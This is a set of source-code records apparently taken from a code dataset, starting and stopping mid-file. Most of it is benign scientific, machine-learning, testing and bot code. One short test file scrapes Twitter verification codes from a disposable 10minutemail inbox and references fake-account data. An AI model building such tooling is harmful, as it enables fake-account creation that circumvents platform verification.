print(moment,curve)\n if self.curve_pl==\"no data\":\n self.curve_pl = curve\n if self.s_pl==\"no data\":\n self.s_pl = moment \n\n print(self.b, self.d, self.r, self.t_flange, self.t_web, self.c, self.spr, self.s_ult, self.n, self.Eel, self.s_pl, self.curve_pl)\n self.width, self.height = image.size\n self.ax = ax\n self.background = None\n self.horizontal_line = ax.axhline(color='k', lw=0.4, ls='--')\n self.vertical_line = ax.axvline(color='k', lw=0.4, ls='--')\n # text location in axes coordinates\n self.text = ax.text(0.72, 0.9, '')\n self._creating_background = False\n self.ratio=[1,5]\n self.points=[]\n self.pointsx=[]\n self.pointsy=[]\n self.px=[]\n self.py=[]\n self.redo_grid()\n self.first_clicks=True\n self.first_click = [0,0]\n self.second_click = [0,0]\n self.on_mouse_move(\"\",True)\n \n\n\n\n def redo_grid(self):\n self.ax.set_xlim([0,self.width])\n self.ax.set_ylim([0,self.height])\n ax.set_ylim(ax.get_ylim()[::-1])\n\n\n def on_draw(self, event):\n self.create_new_background()\n\n def set_cross_hair_visible(self, visible):\n need_redraw = self.horizontal_line.get_visible() != visible\n self.horizontal_line.set_visible(visible)\n self.vertical_line.set_visible(visible)\n self.text.set_visible(visible)\n return need_redraw\n\n def create_new_background(self):\n if self._creating_background:\n # discard calls triggered from within this function\n return\n self._creating_background = True\n self.set_cross_hair_visible(False)\n self.ax.figure.canvas.draw()\n self.background = self.ax.figure.canvas.copy_from_bbox(self.ax.bbox)\n self.set_cross_hair_visible(True)\n self._creating_background = False\n\n def drawing(self):\n self.ax.draw_artist(self.ax.scatter([self.first_click[0],self.second_click[0]],[self.first_click[1],self.second_click[1]],c='r',s=30,marker='x'))\n self.ax.draw_artist(self.ax.scatter(self.pointsx,self.pointsy,c='k',s=30,marker='x'))\n\n\n\n def on_mouse_move(self, event, 
initial=False):\n if self.background is None:\n self.create_new_background()\n if initial ==True:\n need_redraw = self.set_cross_hair_visible(False)\n if need_redraw:\n self.ax.figure.canvas.restore_region(self.background)\n self.drawing()\n self.ax.figure.canvas.blit(self.ax.bbox)\n return\n if not event.inaxes:\n need_redraw = self.set_cross_hair_visible(False)\n if need_redraw:\n self.ax.figure.canvas.restore_region(self.background)\n self.drawing()\n self.ax.figure.canvas.blit(self.ax.bbox)\n else:\n self.set_cross_hair_visible(True)\n # update the line positions\n x, y = event.xdata, event.ydata\n x = round(x/self.ratio[0],self.ratio[1])*self.ratio[0]\n y = round(y/self.ratio[0],self.ratio[1])*self.ratio[0]\n self.horizontal_line.set_ydata(y)\n self.vertical_line.set_xdata(x)\n self.text.set_position((x+0.1,y+0.1))\n self.text.set_text('(%1.2f, %1.2f)' % (x, y))\n self.ax.figure.canvas.restore_region(self.background)\n self.drawing()\n if self.points.count([x,y])!=0:\n self.ax.draw_artist(self.ax.scatter(x,y,c='y',s=20))\n if len(self.pointsx)>2.5:\n line, = self.ax.plot(self.px, self.py, 'b-')\n self.ax.draw_artist(line)\n self.ax.draw_artist(self.horizontal_line)\n self.ax.draw_artist(self.vertical_line)\n self.ax.draw_artist(self.text)\n self.ax.figure.canvas.blit(self.ax.bbox)\n\n def on_mouse_click(self, event):\n if self.background is None:\n self.create_new_background()\n if not event.inaxes:\n need_redraw = self.set_cross_hair_visible(False)\n if need_redraw:\n self.ax.figure.canvas.restore_region(self.background)\n self.drawing()\n self.ax.figure.canvas.blit(self.ax.bbox)\n else:\n x, y = event.xdata, event.ydata\n x = round(x/self.ratio[0],self.ratio[1])*self.ratio[0]\n y = round(y/self.ratio[0],self.ratio[1])*self.ratio[0]\n if self.first_clicks:\n if self.first_click == [0,0]:\n self.first_click=[x,y]\n else:\n self.second_click = [x,y]\n self.first_clicks = False\n else:\n self.points.append([x,y])\n self.pointsx.append(x)\n self.pointsy.append(y)\n if len(self.pointsx)>2.5:\n self.pointsnp = np.array(self.points)\n self.path = evaluate_bezier(self.pointsnp, 20)\n self.px, self.py = self.path[:,0], self.path[:,1]\n \n self.ax.figure.canvas.restore_region(self.background)\n self.drawing()\n if self.points.count([x,y])!=0:\n self.ax.draw_artist(self.ax.scatter(x,y,c='y',s=20))\n if len(self.pointsx)>2.5:\n line, = self.ax.plot(self.px, self.py, 'b-')\n self.ax.draw_artist(line)\n self.ax.draw_artist(self.horizontal_line)\n self.ax.draw_artist(self.vertical_line)\n self.ax.draw_artist(self.text)\n self.ax.figure.canvas.blit(self.ax.bbox)\n self.on_mouse_move(\"\",True)\n\n def on_mouse_click2(self, event):\n x, y = event.xdata, event.ydata\n print(x,y)\n print(y*self.s_pl)\n\n\n def on_key_click(self, event):\n if event.key ==\"c\":\n self.points.pop()\n self.pointsx.pop()\n self.pointsy.pop()\n \n if event.key ==\"o\":\n if not self.first_clicks:\n x1 = self.first_click[0]\n y1 = self.first_click[1]\n x0 = self.second_click[0]\n y0 = self.second_click[1]\n self.new_points = []\n self.new_x = []\n self.new_y = []\n for p in self.points:\n self.new_points.append([self.scale_point[0]*(p[0]-x0)/(x1-x0),self.scale_point[1]*(p[1]-y0)/(y1-y0)])\n self.new_points = np.array(self.new_points)\n plt.close('all')\n fig = plt.figure(figsize=(11, 8))\n self.path = evaluate_bezier(self.new_points, 50)\n\n self.moment, self.A = moment_graph(shape = self.shape, b = self.b, d = self.d, r = self.r, t_flange = self.t_flange, t_web = self.t_web, c = self.c, Eel = self.Eel, spr = self.spr, n = 
self.n, v = self.v, k = self.k, last = self.new_points[-1][0], curve_pl=self.curve_pl, s_pl=self.s_pl, s_ult = False)\n\n            plt.plot(self.A, self.moment, 'r-', label='Theoretical')\n            dpath = derivative(self.path)\n            ddpath = derivative(dpath)\n            x, y = self.new_points[:,0], self.new_points[:,1]\n            px, py = self.path[:,0], self.path[:,1]\n            dpx, dpy = dpath[:,0], 0.0001*dpath[:,1]\n            ddpx, ddpy = ddpath[:,0], 0.00000001*ddpath[:,1]\n            plt.plot(px, py, 'b-', label='Moment')\n            plt.ylabel('Moment / KNm')\n            plt.xlabel('Curvature / rad')\n            plt.grid(True,'both')\n            plt.plot(dpx, dpy, 'k-',label='1st Derivative (x10^-4)')\n            plt.plot(ddpx, ddpy, 'r-', label='2nd Derivative (x10^-8)')\n            plt.plot(x, y, 'ko')\n            fig.canvas.mpl_connect('button_press_event', graph_plotter.on_mouse_click2)\n            fig.canvas.mpl_connect('key_press_event', graph_plotter.on_key_click2)\n            plt.legend()\n            \n            plt.show()\n\n    def on_key_click2(self, event):\n        plt.close('all')\n        fig = plt.figure(figsize=(11, 8))\n        \"\"\"if event.key ==\"up\":\n            self.spr += 5\n            self.s_ult += 6\n        if event.key ==\"down\":\n            self.spr -= 5\n            self.s_ult += 6\n        if event.key ==\"left\":\n            self.Eel += 5000\n        if event.key ==\"right\":\n            self.Eel -= 5000\n        if event.key ==\"w\":\n            self.spr += 25\n            self.s_ult += 30\n        if event.key ==\"s\":\n            self.spr -= 25\n            self.s_ult += 30\n        if event.key ==\"a\":\n            self.Eel += 25000\n        if event.key ==\"d\":\n            self.Eel -= 25000\n        if event.key ==\"m\":\n            self.n += 0.5\n        if event.key ==\"n\":\n            self.n -= 0.5\n        if event.key ==\"k\":\n            self.n += 3\n        if event.key ==\"j\":\n            self.n -= 3\n\n        moment, A = moment_graph(shape = self.shape, b = self.b, d = self.d, r = self.r, t_flange = self.t_flange, t_web = self.t_web, c = self.c, Eel = self.Eel, spr = self.spr, n = self.n, v = self.v, k = self.k, last = self.new_points[-1][0], curve_pl=self.curve_pl, s_pl=self.s_pl, s_ult = False)\n        \"\"\"\n\n        if event.key ==\"up\":\n            self.moment = [i * 1.02 for i in self.moment]\n        if event.key ==\"down\":\n            self.moment = [i / 1.02 for i in self.moment]\n        if event.key ==\"left\":\n            self.A = [i / 1.02 for i in self.A]\n        if event.key ==\"right\":\n            self.A = [i * 1.02 for i in self.A]\n        if event.key ==\"w\":\n            self.moment = [i * 1.2 for i in self.moment]\n        if event.key ==\"x\":\n            self.moment = [i / 1.2 for i in self.moment]\n        if event.key ==\"a\":\n            self.A = [i / 1.2 for i in self.A]\n        if event.key ==\"d\":\n            self.A = [i * 1.2 for i in self.A] \n        plt.plot(self.A, self.moment, 'r-', label='Theoretical')\n        #dpath = derivative(self.path)\n        #ddpath = derivative(dpath)\n        x, y = self.new_points[:,0], self.new_points[:,1]\n        px, py = self.path[:,0], self.path[:,1]\n        #dpx, dpy = dpath[:,0], dpath[:,1]\n        #ddpx, ddpy = ddpath[:,0], ddpath[:,1]\n        plt.plot(px, py, 'b-', label='Experimental')\n        plt.ylabel('Moment / KNm')\n        plt.xlabel('Curvature / rad')\n        plt.grid(True,'both')\n        #plt.plot(dpx, dpy, 'k-')\n        #plt.plot(ddpx, ddpy, 'r-')\n        plt.plot(x, y, 'yo')\n        fig.canvas.mpl_connect('button_press_event', graph_plotter.on_mouse_click2)\n        fig.canvas.mpl_connect('key_press_event', graph_plotter.on_key_click2)\n        plt.legend()\n        plt.show()\n\ndef derivative(points):\n    derivatives = []\n    for i in range(len(points)-1):\n        g = (points[i+1][1]-points[i][1])/(points[i+1][0]-points[i][0])\n        x = (points[i+1][0]+points[i][0])/2\n        derivatives.append([x,g])\n    return np.array(derivatives)\n\n# find the a & b points\ndef get_bezier_coef(points):\n    # since the formulas work given that we have n+1 points\n    # then n must be this:\n    n = len(points) - 1\n\n    # build coefficients matrix\n    C = 4 * np.identity(n)\n    
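# This banded system appears to follow the standard construction for a smooth piecewise-cubic Bezier fit: ones on the off-diagonals, with adjusted first and last rows for the endpoint conditions.\n    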
np.fill_diagonal(C[1:], 1)\n np.fill_diagonal(C[:, 1:], 1)\n C[0, 0] = 2\n C[n - 1, n - 1] = 7\n C[n - 1, n - 2] = 2\n\n # build points vector\n P = [2 * (2 * points[i] + points[i + 1]) for i in range(n)]\n P[0] = points[0] + 2 * points[1]\n P[n - 1] = 8 * points[n - 1] + points[n]\n\n # solve system, find a & b\n A = np.linalg.solve(C, P)\n B = [0] * n\n for i in range(n - 1):\n B[i] = 2 * points[i + 1] - A[i + 1]\n B[n - 1] = (A[n - 1] + points[n]) / 2\n\n return A, B\n\n# returns the general Bezier cubic formula given 4 control points\ndef get_cubic(a, b, c, d):\n return lambda t: np.power(1 - t, 3) * a + 3 * np.power(1 - t, 2) * t * b + 3 * (1 - t) * np.power(t, 2) * c + np.power(t, 3) * d\n\n# return one cubic curve for each consecutive points\ndef get_bezier_cubic(points):\n A, B = get_bezier_coef(points)\n return [\n get_cubic(points[i], A[i], B[i], points[i + 1])\n for i in range(len(points) - 1)\n ]\n\n# evalute each cubic curve on the range [0, 1] sliced in n points\ndef evaluate_bezier(points, n):\n curves = get_bezier_cubic(points)\n return np.array([fun(t) for fun in curves for t in np.linspace(0, 1, n)])\n\n\n\n \nTHIS_FOLDER = os.path.dirname(os.path.abspath(__file__))\npic = os.path.join(THIS_FOLDER, 'Graphs','4-10-Zhou-Young-RHS.png')\n\nfig, ax = plt.subplots(figsize=(15,9))\nimData = plt.imread(pic)\nimage = Image.open(pic)\nplt.imshow(imData)\ngraph_plotter = Graphplotter(ax, image, scale_point=[0.0012,40], shape = \"RHS\", row_number = (23-1), v = 0.3, k = -0.46)\n\nfig.canvas.mpl_connect('motion_notify_event', graph_plotter.on_mouse_move)\nfig.canvas.mpl_connect('button_press_event', graph_plotter.on_mouse_click)\nfig.canvas.mpl_connect('key_press_event', graph_plotter.on_key_click)\nplt.show()","sub_path":"graph_code.py","file_name":"graph_code.py","file_ext":"py","file_size_in_byte":15114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"579912292","text":"a=int(input())\narr=list(map(int,input().split()))\nc=[]\nfor k in range(0,a):\n for j in range(k+1,a):\n if arr[k]==arr[j]:\n c.append(arr[k])\nif len(c)==0:\n print(\"unique\")\nelse:\n c.sort()\nif(len(set(c))==1):\n print(c[0])\nelse:\n for r in range(0,len(c)):\n print(c[r],end=\" \")\n","sub_path":"printing rpeated number in list.py","file_name":"printing rpeated number in list.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596522556","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCS224N 2019-20: Homework 5\n\"\"\"\n\nimport torch\nimport torch.nn as nn\n\n\nclass Highway(nn.Module):\n \"\"\"\n A highway network.\n \"\"\"\n def __init__(self, embed_size):\n \"\"\" Init Highway Layer.\n\n @param embed_size (int): Embedding size for character (dimensionality)\n \"\"\"\n super(Highway, self).__init__()\n self.embed_size = embed_size\n\n self.W_proj = nn.Linear(in_features=embed_size, out_features=embed_size)\n # nn.init.xavier_uniform_(self.W_proj.weight)\n # nn.init.uniform_(self.W_proj.bias)\n\n self.W_gate = nn.Linear(in_features=embed_size, out_features=embed_size)\n # nn.init.xavier_uniform_(self.W_gate.weight)\n # nn.init.uniform_(self.W_gate.bias)\n\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x_conv_out: torch.Tensor) -> torch.Tensor:\n \"\"\" Takes a mini-batch of x_conv_out and returns a tensor corresponding to highway operation output.\n\n @param x_conv_out (torch.Tensor): Tensor returned from 
convolutional network of shape (embed_size, ).\n\n        @returns x_highway (torch.Tensor): A tensor of shape (embed_size, ) representing output of highway network.\n        \"\"\"\n        x_proj = self.relu(self.W_proj(x_conv_out))\n        x_gate = self.sigmoid(self.W_gate(x_conv_out))\n        x_highway = x_gate * x_proj + (1-x_gate) * x_conv_out\n        return x_highway\n","sub_path":"a5/highway.py","file_name":"highway.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228528362","text":"from BaseObjects import BaseEDAPage\nfrom EDA import eda_lex_locators\nfrom cumulusci.robotframework.pageobjects import BasePage\nfrom cumulusci.robotframework.pageobjects import pageobject\nimport time\n\n@pageobject(\"Courses\", \"HEDA_Settings\")\nclass CoursesSettingsPage(BaseEDAPage, BasePage):\n\n    def _is_current_page(self):\n        \"\"\"\n        Verify we are on the EDA Settings page for Courses\n        by verifying the HEDA Settings URL and the Courses tab\n        \"\"\"\n        location = \"/lightning/n/{}{}\".format(self.eda.get_eda_namespace_prefix(), self._object_name)\n        self.selenium.location_should_contain(location)\n\n        locator_tab = eda_lex_locators[\"eda_settings\"][\"tab\"].format(\"Courses\")\n        self.selenium.wait_until_page_contains_element(\n            locator_tab,\n            error=f\"Courses tab with locator '{locator_tab}' is not available on the page\"\n        )\n\n    def verify_text_appears(self, textMessage):\n        \"\"\" Verify the text message is displayed\n            this message gets displayed when the 'Run copy' button is clicked\n            in both read and edit mode\n        \"\"\"\n        time.sleep(0.5) # No other element to wait on until this page loads, so using sleep\n        locator = eda_lex_locators[\"eda_settings_courses\"][\"text_message\"].format(textMessage)\n        self.selenium.wait_until_page_contains_element(locator,\n                                                       error=\"Run copy text is not displayed\")\n        text = self.selenium.get_webelement(locator).get_attribute(\"className\")\n        if \"slds-hide\" in text:\n            raise Exception(f\"The text message {textMessage} is not displayed\")","sub_path":"robot/EDA/resources/CoursesSettingsPageObject.py","file_name":"CoursesSettingsPageObject.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"45320646","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nSamuel Niang\nFor IPNL (Nuclear Physics Institute of Lyon)\n\"\"\"\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tools import importPickle\nfrom matplotlib import ticker, cm\n\nfilename = 'charged_hadrons_100k.energydata'\ndata = importPickle(filename)\nfilename = 'prod2_200_400k.energydata'\ndata = data.mergeWith(importPickle(filename))\n\n# split the data in two\ndata1,data2 = data.splitInTwo()\n\nloc = ticker.LinearLocator(10)\nfor nbLego in np.linspace(10,180,18):\n    nbLego = int(nbLego)\n    # use data1 to build a calibration model\n    cal = data1.calibrationLego(nbLego,True)\n    x = np.linspace(cal.ecal.min(), cal.ecal.max(),cal.nbLego)\n    y = np.linspace(cal.hcal.min(), cal.hcal.max(),cal.nbLego)\n    X, Y = np.meshgrid(x,y)\n    Z = cal.getPrecision(X,Y)\n    \n    fig = plt.figure(1,figsize=(10, 7))\n    plt.title(r\"$\\Delta\\overline{true}/\\overline{true}$ per bin,$n_{Lego} = \"+str(nbLego)+\"$\",fontsize=20)\n    plt.xlabel(r\"$E_{cal}$\",fontsize=20)\n    plt.ylabel(r\"$H_{cal}$\",fontsize=20)\n    cs = plt.contourf(X,Y,Z, locator=loc, cmap=cm.hot)\n    cbar = fig.colorbar(cs)\n    plt.show()\n    
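# Save the contour plot shown above to EPS, one file per nbLego value (saving before plt.show() is often safer, as some backends clear the canvas when the window closes).\n    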
fig.savefig('pictures/CalibrationLegoTest5/CalibrationLegoTest5_'+str(nbLego)+'.eps')\n \n\nplt.close()","sub_path":"lego_calibration5.py","file_name":"lego_calibration5.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"359843828","text":"print(__doc__)\n\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn.externals import joblib\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef main():\n print('参数个数为:', len(sys.argv), '个参数。')\n print('参数列表:', str(sys.argv))\n print('脚本名为:', sys.argv[0])\n for i in range(1, len(sys.argv)):\n print('参数 %s 为:%s' % (i, sys.argv[i]))\n dict = createDict(sys.argv)\n createDataSet(dict)\n\n\ndef createDict(args):\n dict = {};\n dict['penalty'] = args[1];\n dict['dual'] = False;\n if args[2] == 'True':\n dict['dual'] = True\n print(dict)\n dict['tol'] = float(args[3]);\n dict['C'] = float(args[4]);\n dict['fit_intercept'] = False\n if args[5] == 'True':\n dict['fit_intercept'] = True\n dict['intercept_scaling'] = int(args[6]);\n if args[7] == 'None':\n args[7] = None\n dict['class_weight'] = args[7];\n if args[8] == 'None':\n args[8] = None\n dict['random_state'] = args[8];\n dict['solver'] = args[9];\n dict['max_iter'] = int(args[10]);\n dict['multi_class'] = args[11];\n dict['verbose'] = int(args[12]);\n dict['warm_start'] = False;\n if args[13] == 'True':\n dict['warm_start'] = True\n if args[14] == 'None':\n args[14] = None\n dict['n_jobs'] = args[14];\n if args[15] == 'None':\n args[15] = None\n dict['l1_ratio'] = args[15];\n dict['dimension'] = int(args[16]);\n dict['in_file_path'] = args[17];\n dict['out_file_path'] = args[18];\n return dict\n\n\ndef createDataSet(dict):\n dataset = pd.read_csv(dict['in_file_path']) # usecols = [3,4]\n header = dataset.columns.values;\n length = len(header)\n dimension = dict['dimension']\n\n list = []\n for i in range(length - dimension - 1, length - 1):\n list.append(i)\n X = dataset.iloc[:, list].values\n scla = StandardScaler()\n X = scla.fit_transform(X)\n if (dimension > 2):\n X = PCA(n_components=2).fit_transform(X)\n Y0 = dataset.iloc[:, [length - 1]].values\n Y = []\n for i in range(0, len(Y0)):\n Y.append(Y0[i][0])\n Y = np.array(Y)\n print(Y)\n\n clf = LogisticRegression(penalty=dict['penalty'],\n dual=dict['dual'],\n tol=dict['tol'],\n C=dict['C'],\n fit_intercept=dict['fit_intercept'],\n intercept_scaling=dict['intercept_scaling'],\n class_weight=dict['class_weight'],\n random_state=dict['random_state'],\n solver=dict['solver'],\n max_iter=dict['max_iter'],\n multi_class=dict['multi_class'],\n verbose=dict['verbose'],\n warm_start=dict['warm_start'],\n n_jobs=dict['n_jobs'],\n l1_ratio=dict['l1_ratio']\n )\n clf.fit(X, Y)\n # print the training scores\n print(\"training score : %.3f \" % (clf.score(X, Y)))\n\n model_path = dict['out_file_path']\n model_parent_path = os.path.split(model_path)[0]\n if not os.path.exists(model_parent_path):\n os.makedirs(model_parent_path)\n joblib.dump(clf, model_path)\n\n # create a mesh to plot in\n h = .02 # step size in the mesh\n x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n\n # Plot the decision boundary. 
For that, we will assign a color to each\n    # point in the mesh [x_min, x_max]x[y_min, y_max].\n    Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\n    # Put the result into a color plot\n    Z = Z.reshape(xx.shape)\n    plt.figure()\n    plt.contourf(xx, yy, Z, cmap=plt.cm.Paired)\n    plt.title(\"Decision surface of LogisticRegression\")\n    plt.axis('tight')\n\n    # Plot also the training points\n    for i in clf.classes_:\n        idx = np.where(Y == i)\n        plt.scatter(X[idx, 0], X[idx, 1], cmap=plt.cm.Paired,\n                    edgecolor='black', s=20)\n\n    png_path = os.path.splitext(model_path)[0] + \".png\"\n    plt.savefig(png_path)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"nm/Logistic/Logistic_train.py","file_name":"Logistic_train.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"124844549","text":"import asyncio\nimport logging\nimport pandas as pd\n\nfrom gateways.bno_news_gateway import BnoNewsGatewayError\nfrom utils.data import remove_non_integers_from_string\n\nfrom texttable import Texttable\n\n\nclass UpdaterService:\n    def __init__(\n        self, bno_news_gateway, data_parser_service, region, update_interval, discord_channel_id, output, logger=None,\n    ):\n        self.bno_news_gateway = bno_news_gateway\n        self.data_parser_service = data_parser_service\n        self.region = region\n        self.update_interval = update_interval\n        self.discord_channel_id = discord_channel_id\n        self.output = output\n        self.previous_data = pd.DataFrame()\n        self.logger = logger if logger else logging.getLogger(__name__)\n\n    async def update_loop(self, discord_client):\n        self.logger.info(\"Coronavirus Updater Initialised\")\n\n        while not discord_client.is_closed():\n            self.logger.info(\"Fetching the latest Coronavirus statistics\")\n\n            try:\n                latest_data = self.bno_news_gateway.fetch_raw()\n            except BnoNewsGatewayError as bnge:\n                self.logger.critical(f\"Failed to fetch the latest virus data - {str(bnge)}\")\n                self.logger.info(\"Trying again in 60 seconds...\")\n                await asyncio.sleep(60)\n                continue\n\n            self.logger.debug(\"Data fetched successfully. Parsing...\")\n\n            if self.region in [\"china\", \"international\"]:\n                data = self.data_parser_service.create_dataframe_from_bno_data(latest_data, self.region)\n            else:\n                china_data = self.data_parser_service.create_dataframe_from_bno_data(latest_data, \"china\")\n                international_data = self.data_parser_service.create_dataframe_from_bno_data(\n                    latest_data, \"international\"\n                )\n\n                data = china_data.append(international_data, ignore_index=True)\n\n            self.logger.debug(\"Data parsed successfully\")\n\n            if not self.previous_data.empty:\n                self.logger.debug(\"Checking against previous data\")\n\n                data_diff = pd.concat([self.previous_data, data]).drop_duplicates(keep=False)\n\n                if not data_diff.empty:\n                    self.logger.debug(\"Data has changed. Creating and sending messages\")\n                    update_messages = self._make_update_message(data_diff)\n\n                    for update in update_messages:\n                        await discord_client.get_channel(self.discord_channel_id).send(update)\n                else:\n                    self.logger.debug(\"No changes in data - sleeping\")\n            else:\n                self.logger.info(\"Previous data is empty - not comparing. 
Updating values\")\n\n self.previous_data = data\n\n await asyncio.sleep(self.update_interval)\n\n def _make_update_message(self, data):\n if self.output == \"table\":\n return self._make_table_update(data)\n else:\n return self._make_text_update(data)\n\n def _make_table_update(self, data):\n table = Texttable()\n\n table.set_cols_align([\"c\"] * len(data.columns))\n table.set_cols_valign([\"m\"] * len(data.columns))\n\n parsed_data = self._collect_differences(data)\n\n new_data = [data.columns.tolist()]\n\n for index, row in parsed_data.iterrows():\n (location, cases_before, cases_after, deaths_before, deaths_after, notes,) = row\n\n cases_diff = int(cases_after) - int(cases_before)\n deaths_diff = int(deaths_after) - int(deaths_before)\n\n if cases_diff > 0:\n cases = \"\".join([cases_after, \" (+\", str(cases_diff), \")\"])\n elif cases_diff < 0:\n cases = \"\".join([cases_after, \" (\", str(cases_diff), \")\"])\n else:\n cases = cases_after\n\n if deaths_diff > 0:\n deaths = \"\".join([deaths_after, \" (+\", str(deaths_diff), \")\"])\n elif deaths_diff < 0:\n deaths = \"\".join([deaths_after, \" (\", str(deaths_diff), \")\"])\n else:\n deaths = deaths_after\n\n # TODO: Fix the new columns that were added in with issue #3\n new_data.append([location, cases, deaths, \"0\", \"0\", \"0\", notes])\n\n table.add_rows(new_data)\n\n message_cache = []\n all_messages = []\n\n table_split = table.draw().split(\"\\n\")\n\n while table_split:\n message = table_split.pop(0) + \"\\n\"\n message_cache.append([message])\n\n total_message = \"\".join(m[0] for m in message_cache)\n\n if len(total_message) > 1700 or not table_split:\n all_messages.append(f\"```{total_message[:-1]}```\")\n message_cache = []\n\n return all_messages\n\n def _make_text_update(self, data):\n TEXT_TEMPLATE = {\n \"cases_up\": \"{count} new case(s) identified in **{location}**, total case(s) now are {current}\",\n \"cases_down\": \"{count} incorrectly identified case(s) in **{location}**, total case(s) now are {current}\",\n \"deaths_up\": \"{count} new death(s) recorded in **{location}**, total death(s) now are {current}\",\n \"deaths_down\": \"{count} incorrectly identified death(s) in **{location}**, total death(s) now are {current}\",\n }\n\n parsed_data = self._collect_differences(data)\n\n message_store = []\n\n for index, row in parsed_data.iterrows():\n (location, cases_before, cases_after, deaths_before, deaths_after, notes,) = row\n\n cases_diff = int(cases_after) - int(cases_before)\n deaths_diff = int(deaths_after) - int(deaths_before)\n\n if cases_diff > 0:\n message_store.append(\n TEXT_TEMPLATE[\"cases_up\"].format(count=cases_diff, location=location, current=cases_after,)\n ),\n elif cases_diff < 0:\n message_store.append(\n TEXT_TEMPLATE[\"cases_down\"].format(count=abs(cases_diff), location=location, current=cases_after,)\n ),\n\n if deaths_diff > 0:\n message_store.append(\n TEXT_TEMPLATE[\"deaths_up\"].format(count=deaths_diff, location=location, current=deaths_after,)\n ),\n elif deaths_diff < 0:\n message_store.append(\n TEXT_TEMPLATE[\"deaths_down\"].format(\n count=abs(deaths_diff), location=location, current=deaths_after,\n )\n ),\n\n message_cache = []\n all_messages = []\n\n while message_store:\n message = message_store.pop(0) + \"\\n\"\n message_cache.append([message])\n\n total_message = \"\".join(m[0] for m in message_cache)\n\n if len(total_message) > 1700 or not message_store:\n all_messages.append(total_message[:-1])\n message_cache = []\n\n return all_messages\n\n def 
_collect_differences(self, data):\n columns = [\n \"location\",\n \"cases_before\",\n \"cases_after\",\n \"deaths_before\",\n \"deaths_after\",\n \"notes\",\n ]\n parsed_data = []\n changed_locations = data.Location.unique()\n\n for location in changed_locations:\n location_data = data.loc[data[\"Location\"] == location]\n\n if len(location_data) == 1:\n cases_before = \"0\"\n deaths_before = \"0\"\n else:\n cases_before = remove_non_integers_from_string(location_data.iloc[0][\"Cases\"])\n deaths_before = remove_non_integers_from_string(location_data.iloc[0][\"Deaths\"])\n\n cases_after = remove_non_integers_from_string(location_data.iloc[-1][\"Cases\"])\n deaths_after = remove_non_integers_from_string(location_data.iloc[-1][\"Deaths\"])\n\n notes = location_data.iloc[-1][\"Notes\"]\n\n parsed_data.append(\n [location, cases_before, cases_after, deaths_before, deaths_after, notes,]\n )\n\n return pd.DataFrame(parsed_data, columns=columns)\n","sub_path":"services/updater_service.py","file_name":"updater_service.py","file_ext":"py","file_size_in_byte":8173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"95781163","text":"# Tests for ResponseParser class\n#\n#\n\nfrom HttpClient import HttpClient\nfrom ResponseParser import ResponseParser\n\n\ntestUrl = \"https://10minutemail.net/\"\n\ntestClient = HttpClient()\ntestParser = ResponseParser()\n\n# testResponse = testClient.initialRequest(testUrl)\n# cookie = testParser.getCookies(testResponse)\ncookie = {\"PHPSESSID\":\"e2ee08ec196ed786ada381722fd1b5a5\"}\ntestResponse = testClient.sendRequest(testUrl, cookie)\nlinks = testParser.getInboxLinks(testResponse)\n\nfor link in links:\n code = testParser.getTwitterCode(\n testClient.sendRequest(testUrl + link, cookie))\n print(code)\n\n\n# Test getFakeAccData method\n# print( testParser.getFakeAccData(testResponse))\n\n# Test getInboxLinks method\n# print( testParser.getInboxLinks(testResponse))\n\n# Test ... 
method\n# print()\n","sub_path":"Parser/Test/ParserTest.py","file_name":"ParserTest.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76208603","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 15 17:39:05 2021\r\n\r\n@author: ania\r\n\"\"\"\r\nimport pandas as pd\r\n\r\ndef Komunikat(tekst):\r\n input(tekst+\"\\n\\nWCIŚNIJ ENTER ŻEBY KONTYNUOWAĆ\")\r\n\r\ndef WczytajDane():\r\n data = pd.read_excel('MagazynKsiazek.xlsx',\"Sheet1\", index_col=0)\r\n data = pd.DataFrame(data)\r\n return data\r\n\r\ndef PokazPozycje(data):\r\n ilosc_pozycji=len(data)\r\n if(ilosc_pozycji<1):\r\n Komunikat(\"Brak ksiązek w magazynie!\")\r\n else:\r\n print(data)\r\n print(\"\")\r\n \r\ndef DodajPozycje(data):\r\n print(\"Podaj dane:\")\r\n tytul=input(\"Tytuł: \")\r\n autor=input(\"Autor: \")\r\n wydawnictwo=input(\"Wydawnictwo: \")\r\n ilosc_stron=input(\"Ilość stron: \")\r\n rok_wydania=input(\"Rok wydania: \")\r\n new_row={'Tytuł':tytul,'Autor':autor,'Wydawnictwo': wydawnictwo,'Ilość stron':ilosc_stron,'Rok wydania':rok_wydania}\r\n data=data.append(new_row,ignore_index=True)\r\n try: 